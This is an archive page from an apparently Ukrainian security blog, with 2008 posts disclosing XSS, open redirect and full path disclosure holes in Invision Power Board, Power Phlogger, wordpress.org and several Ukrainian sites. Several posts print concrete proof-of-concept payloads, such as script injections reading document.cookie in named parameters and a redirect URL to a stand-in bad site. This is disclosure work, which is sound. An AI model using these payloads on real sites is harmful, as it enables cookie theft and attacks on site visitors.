Архів для категорії 'Уразливості'

Cross-Site Scripting в Invision Power Board

23:53 21.05.2008

Виявлена Cross-Site Scripting уразливість в IPB. Це persistent XSS уразливість, що дозволяє розмістити html сторінку з атакуючим кодом на сторінках форума.

Уразливі версії Invision Power Board 2.3.5 та попередні.

IPB не перевіряє вміст htm та html файлів на наявність небезпечного коду. Уразливість працює в Internet Explorer (скрипт спрацьовує автоматично при завантаженні прикріпленного файла) та в Mozilla і Firefox (скрипт спрацьовує якщо в діалозі збереження файла вибрати його відкриття в браузері).

А також, як я перевірив пізніше, уразливість працює в Opera. Причому в IE та Opera код виконується в контексті сайта.

Уразливість на fileshare.in.ua

20:30 21.05.2008

29.01.2008

У червні, 29.06.2007, я знайшов Cross-Site Scripting уразливість на проекті http://fileshare.in.ua (файлообмінник та хостінг файлів). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

21.05.2008

XSS:

Дана уразливість вже виправлена.

Уразливості на shiflett.org

23:58 20.05.2008

Нещодавно, 15.05.2008, я знайшов Redirector та Cross-Site Scripting уразливості на секюріті проекті http://shiflett.org. Про що найближчим часом сповіщу адміністратора сайта.

Уразливості наявні в CSRF Редиректорі про який я перед цим розповідав.

Redirector:

Відкритий CSRF редиректор, призводить до появи редиректор уразливості, що може бути використана в тому числі й для атак на відвідувачів сайта.

http://shiflett.org/csrf.php?csrf=http://badsite

В даному випадку редирекція відбувається у скритому іфреймі. Якщо необхідна відкрита редирекція, то потрібно використати спеціальний підхід (провести XSS атаку), як показано нижче.

XSS (RXI):

Дана уразливість є Remote XSS Include.

В даному випадку XSS код виконує редирекцію. Так само може бути виконаний будь-який код, в тому числі й шкідливий. Для цього потрібно лише розмістити необхідний для RXI атаки файл.

Добірка уразливостей

18:17 20.05.2008

В даній добірці уразливості в веб додатках:

Уразливості на market.online.ua та market-ru.online.ua

20:17 19.05.2008

27.01.2008

У червні, 27.06.2007, я знайшов Cross-Site Scripting уразливості на http://market.online.ua та http://market-ru.online.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів online.ua я писав про уразливості на startua.com та online.ua.

Детальна інформація про уразливості з’явиться пізніше.

19.05.2008

XSS:

http://market.online.ua

http://market-ru.online.ua

Дані уразливості були виправлені, але лише частково. Тому дана фільтрація легко обходиться і XSS знову працює.

XSS:

http://market.online.ua

http://market-ru.online.ua

Добірка уразливостей

16:37 17.05.2008

В даній добірці уразливості в веб додатках:

  • c-arbre <= Multiple Remote File Include Vulnerablitiy (деталі)
  • Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit (деталі)
  • File117 Remote File Inclusion (деталі)
  • PHPMyBibli <= Multiple Remote File Include (деталі)
  • lms 1.5.3 Remote File Inclusion (деталі)
  • claroline <= Multiple Remote File Include Vulnerablitiy (деталі)
  • Allfaclassfieds (level2.php dir) remote file inclusion (деталі)
  • Full Path Disclosure in SendCard (деталі)
  • Prototype of an PHP application ===> RFI (деталі)
  • Remote file inclusion vulnerability in cPanel WebHost Manager (WHM) (деталі)

Нові уразливості в Power Phlogger

23:58 16.05.2008

Раніше я вже писав про уразливості в Power Phlogger. Зараз повідомлю про нові уразливості в даній системі для ведення статистики відвідувань. В лютому, 16.02.2008, я виявив Cross-Site Scripting та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

XSS (Persistent):

POST запит на сторінці http://site/edUserprofile.php (можливі як GET, так і POST запити):

</textarea><script>alert(document.cookie)</script>В параметрі: N_your_url.

"><script>alert(document.cookie)</script>В параметрі: N_email.

"><script src=http://site.comВ параметрах: N_fg_c, N_bg_c (обмеження в 30 символів).

XSS:

http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це третя частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Уразливості на wordpress.org

19:47 16.05.2008

06.08.2007

Вчора, 05.08.2007, я знайшов Cross-Site Scripting уразливості на wordpress.org - сайті розробників WordPress. Про що найближчим часом сповіщу адміністрацію сайта.

Дані XSS дірки я знайшов, як раз коли зайшов на сайт почитати новину про вихід нових версій WP (про що я писав перед цим).

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.05.2008

XSS:

POST запит на сторінці http://wordpress.org/report-bugs/:

"><script>alert(document.cookie)</script>В полях: Your Email, URL of Problem.

</textarea><script>alert(document.cookie)</script>В полі: Describe in detail.

Дані уразливості вже виправлені.

Добірка уразливостей

17:30 15.05.2008

В даній добірці уразливості в веб додатках:

Уразливість на www.itmg.com.ua

23:52 14.05.2008

У червні, 20.06.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.itmg.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Дана компанія займається ІТ виставками і семенарами. І вона провела в Києві такі семенари як CEE Outsourcing Summit 2007 та TMT.Ventures’08 Kyiv. Я неодноразово писав про уразливості на сайтах виставок (в тому числі й виставок на тему безпеки) і сайт даної компанії в плані безпеки також нічим не краще за інших. Останнього разу стосовно сайтів виставок я писав про уразливості на imu.org.ua.

XSS:

POST запит на сторінці http://www.itmg.com.ua/search/ (а також на всіх сторінках сайта в пошуковій формі):

"><script>alert(document.cookie)</script>В полі пошуку.

XSS через GET: